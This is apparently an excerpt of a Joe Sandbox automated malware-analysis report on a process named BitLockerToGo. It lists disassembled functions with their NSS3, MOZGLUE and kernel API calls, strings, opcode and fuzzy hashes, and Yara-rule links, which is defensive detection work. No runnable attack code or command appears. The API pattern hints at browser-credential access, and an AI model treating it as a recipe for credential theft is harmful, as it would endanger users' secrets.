                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Error$DecodeItem_QuickUtil
                                                                                                                                                                                                                                                                                                                                                          • String ID: ^jel$acel$acel
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1982233058-3071190905
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e2629d3c1459b9e06c5350bdf746d285cf08b2f3cb8fb1a68fa1104c981a9d46
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 121addc0ea6bdc8e49e0fef76f60ea9f141157da376a69fb21543f977bf4540e
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e2629d3c1459b9e06c5350bdf746d285cf08b2f3cb8fb1a68fa1104c981a9d46
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 49312938A0410597FB508A59DC90BBE7265DB82308FF00A7AD515F7BC8C6B49870879E
                                                                                                                                                                                                                                                                                                                                                          Function 6C6B6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6E36
                                                                                                                                                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C6B6E57
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C6EC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6EC2BF
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6E7D
                                                                                                                                                                                                                                                                                                                                                          • PR_MillisecondsToInterval.NSS3(?), ref: 6C6B6EAA
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                                                                                                                                                                          • String ID: nul
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3163584228-3076721864
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 75e7a8763a9f18bdf21bec9fdff5274dd3607952d25f2b190c2ed52517972ef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0a04a283c80b6fd331c0b88496dea73412ae13b4c6a5476711c3b9126d8aeb9b
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 75e7a8763a9f18bdf21bec9fdff5274dd3607952d25f2b190c2ed52517972ef0
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4631C572618612EFDB185E34DD08396BBA4AB0531AF14063CE59AE6A41E730F467CB85
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA91D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA934
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C6D2AE9,00000000,0000065C), ref: 6C6EA949
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(?,00000000,0000065C), ref: 6C6EA952
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID: *ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595327144-2329082585
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 0bc7946e462ad388b4bc63da8f6ddf541b78d5747c18514322ae4f52bf051f25
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 76e181ae93b558087adb34d772377a6db6f1cc4d015fed1e0345c019cb6bac32
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0bc7946e462ad388b4bc63da8f6ddf541b78d5747c18514322ae4f52bf051f25
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F33128B46062019FDB04CF19D980E62BBF8FF4D319B1581A9E8098F756E730E801CBA5
                                                                                                                                                                                                                                                                                                                                                          Function 6C71A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C5E7915,?,?), ref: 6C71A86D
                                                                                                                                                                                                                                                                                                                                                          • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C5E7915,?,?), ref: 6C71A8A6
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C71A8A0
                                                                                                                                                                                                                                                                                                                                                          • database corruption, xrefs: 6C71A89B
                                                                                                                                                                                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C71A891
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _byteswap_ulongsqlite3_log
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 912837312-598938438
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 6e1ea8a9904ab5ad029d8c0b5516c514f9283a8985b8675854325f6079956088
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1170c26396d2b8a540d990685dd610e3ce3d90771d48997f2596b1a58165ccff
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e1ea8a9904ab5ad029d8c0b5516c514f9283a8985b8675854325f6079956088
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D2110671B04204AFDB058F16DE41A6AB7A5FF89324F044038FC194BE41EB34A95ACB91
                                                                                                                                                                                                                                                                                                                                                          Function 6C630DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C630BDE), ref: 6C630DCB
                                                                                                                                                                                                                                                                                                                                                          • strrchr.VCRUNTIME140(00000000,0000005C,?,6C630BDE), ref: 6C630DEA
                                                                                                                                                                                                                                                                                                                                                          • _stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C630BDE), ref: 6C630DFC
                                                                                                                                                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C630BDE), ref: 6C630E32
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • %s incr => %d (find lib), xrefs: 6C630E2D
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: strrchr$Print_stricmp
                                                                                                                                                                                                                                                                                                                                                          • String ID: %s incr => %d (find lib)
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 97259331-2309350800
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 914cb4f4c34acd4801c1abadf6ac7d8bc35bd1bfdf88eb1f75431ff40efd9e25
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47dd2fd5c15e03b0387e240fb3c15428c0c2d064e224a3980383b4ec106d4d0a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 914cb4f4c34acd4801c1abadf6ac7d8bc35bd1bfdf88eb1f75431ff40efd9e25
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A60124727002249FE7208F25DC49E17B3ECDB45B09B05543DE909D3A81EB61EC1987E1
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC2D
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE24
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C66D079,00000000,00000001), ref: 6C68AE5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE6F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AE7F
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: TlsGetValue.KERNEL32(?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEB1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C68ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C66CDBB,?,6C66D079,00000000,00000001), ref: 6C68AEC9
                                                                                                                                                                                                                                                                                                                                                          • PK11_FreeSymKey.NSS3(?,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC44
                                                                                                                                                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,@]ml,00000000,?,?,6C6C6AC6,?), ref: 6C6EAC59
                                                                                                                                                                                                                                                                                                                                                          • free.MOZGLUE(8CB6FF01,6C6C6AC6,?,?,?,?,?,?,?,?,?,?,6C6D5D40,00000000,?,6C6DAAD4), ref: 6C6EAC62
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
                                                                                                                                                                                                                                                                                                                                                          • String ID: @]ml
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1595327144-1248002651
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ecd3fb5c0e500c1d0768336a95c1dc3d0b1c670bf64401c9c017a64c248333bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 41af555ad1440a9afe6e3ec5cd91fc1d1a000c66b7212c64e49f6a9bd228df7d
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ecd3fb5c0e500c1d0768336a95c1dc3d0b1c670bf64401c9c017a64c248333bb
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71017CB56012009BDB00CF15E8C0B56BBB8AB49B19F1880A9E9498F746D734E809CBA9
                                                                                                                                                                                                                                                                                                                                                          Function 6C5C2940 Relevance: 7.8, APIs: 6, Instructions: 327stringCOMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C5C1360,00000000), ref: 6C5C2A19
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000009,00000034,?,?,?,6C5C1360,00000000), ref: 6C5C2A45
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000000,00000000), ref: 6C5C2A7C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 6C5C2D50: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,BD5F5530,?,?,00000000,?,6C5C296E), ref: 6C5C2DA4
                                                                                                                                                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C5C2AF3
                                                                                                                                                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,00000009,0000000C,?,?,?,6C5C1360,00000000), ref: 6C5C2B71
                                                                                                                                                                                                                                                                                                                                                          • memset.VCRUNTIME140(00000000,00000000,00000034), ref: 6C5C2B90
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: memcpystrlen$memset
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 638109778-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: e9e88590acc6473cc60efa4c7d746a63c0e43bd5587026a608fa622b3b7e7d37
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b640852254650a629dbe2ea67fcf8752d6787bd815a46d999099dd3469ad9d50
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9e88590acc6473cc60efa4c7d746a63c0e43bd5587026a608fa622b3b7e7d37
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ABC1A271F002069BEB04CFA9CC987AAB7B5EF88318F15922DD9199B741D774E841CBD2
                                                                                                                                                                                                                                                                                                                                                          Function 6C5D9C60 Relevance: 7.8, APIs: 6, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D9CF2
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D45
                                                                                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C5D9D8B
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9DDE
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 12a098e9a6966155e7c083534c46452508cd011631e4cd13f682ed50250d09b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: f9321c12e85e8cb949a7b8e9a16c54c26520b571d866cd381dcb124fa54269c7
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12a098e9a6966155e7c083534c46452508cd011631e4cd13f682ed50250d09b4
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A5A19C31704201DBEB09EF69ECA976E3771BB86315F29013DD4064BA40DF3AA846DB86
                                                                                                                                                                                                                                                                                                                                                          Function 6C5DA910 Relevance: 7.7, APIs: 5, Instructions: 241COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3382174438.000000006C5C1000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C5C0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382145732.000000006C5C0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382337030.000000006C75F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382443708.000000006C79E000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382490179.000000006C79F000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382556783.000000006C7A0000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          • Associated: 00000003.00000002.3382595893.000000006C7A5000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_6c5c0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: dd0d542e287e301a2aa1bd1d87cc3f80fb28aaf03932964c3e090693d87ece6a
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 66aef27c77c106f5ed1ce9cf66dbd91551312cc3fe847fb0729a93abdd0c5bfd
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dd0d542e287e301a2aa1bd1d87cc3f80fb28aaf03932964c3e090693d87ece6a
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9491BB31600304CFEB08DFA9ED89B6B37B5BB46309F15057DE50747A40EB39A846DB96
                                                                                                                                                                                                                                                                                                                                                          Function 6C6EDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C6EDD8C
                                                                                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C6EDDB4
